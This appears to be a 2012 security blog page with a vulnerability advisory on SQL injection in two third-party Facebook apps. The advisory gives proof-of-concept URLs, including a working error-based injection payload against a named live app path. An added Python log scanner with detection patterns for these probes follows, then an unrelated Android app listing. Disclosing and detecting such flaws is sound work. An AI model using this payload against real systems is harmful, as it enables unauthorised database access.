Tuesday, 14. February 2012
Facebook - SQL Injection
On Tuesday, 14 Feb 2012 in topic 'Vulnerabilities'
Details:
========
A remote SQL injection vulnerability was detected in the Facebook Life Smile
application (apps.facebook).
The vulnerability allows a remote attacker to inject and execute their own SQL
statements on the affected Facebook application's DBMS.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL injection vulnerability was detected in the Facebook Life Smile
application (apps.facebook).
The vulnerability allows a remote attacker to inject and execute their own SQL
statements on the affected Facebook application's DBMS.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
by
Ninja-Sec
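Added example (not part of the original advisory, and not code from either application): a log check for the two probe styles shown above, a stray quote and an error-based subquery in the `page` parameter of index.php. The log lines are constructed, and the rule that a legitimate `page` value is a short decimal integer is an assumption based on the values `1` and `210` in the demo URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic); paths mirror the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Feb/2012:10:00:01 +0000] "GET /lifesmile/index.php?page=210 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Feb/2012:10:00:07 +0000] "GET /viewmycalendar/index.php?page=1%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [14/Feb/2012:10:00:09 +0000] "GET /lifesmile/index.php?page=210+AND+(SELECT+1+FROM'
    '(SELECT+COUNT(*),FLOOR(RAND(0)*2)x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) HTTP/1.1" 500 298',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d{1,9}")  # assumption: a legitimate page id is a short decimal integer
# Substrings typical of the probes in the advisory, matched after URL-decoding.
MARKERS = {
    "quote": re.compile(r"['\"]"),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
}

def classify_page(url):
    """Return ('ok' | 'absent' | 'reject', reasons) for the page parameter of url."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("page")
    if values is None:
        return "absent", []
    reasons = set()
    if len(values) > 1:
        reasons.add("duplicate_param")
    for value in values:
        if not INT_RE.fullmatch(value):
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            reasons.update(hits or ["non_integer"])
    return ("reject", sorted(reasons)) if reasons else ("ok", [])

def scan(lines):
    """Yield (client_ip, verdict, reasons) for each parsable log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            yield (line.split()[0],) + classify_page(m.group(1))

if __name__ == "__main__":
    for row in scan(SAMPLE_LOG):
        print(row)
```

The same integer check applied server-side, together with a parameterized query, is the actual fix; the log scan only finds probing after the fact.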
Security Xploit v1.0 - Android App
On Tuesday, 14 Feb 2012 in topic 'Android'
Requirements
Requires Android Market and Google account:
No
Requires third-party libraries:
No
Requires 'rooted' device:
No
Target Android version:
Android 3.2
Minimum Android version:
Android 1.6
Minimum screen width:
240 dpx
Download
http://slideme.org/mobileapp/download/1a3dc792-55a7-11e1-a703-00505690390e.apk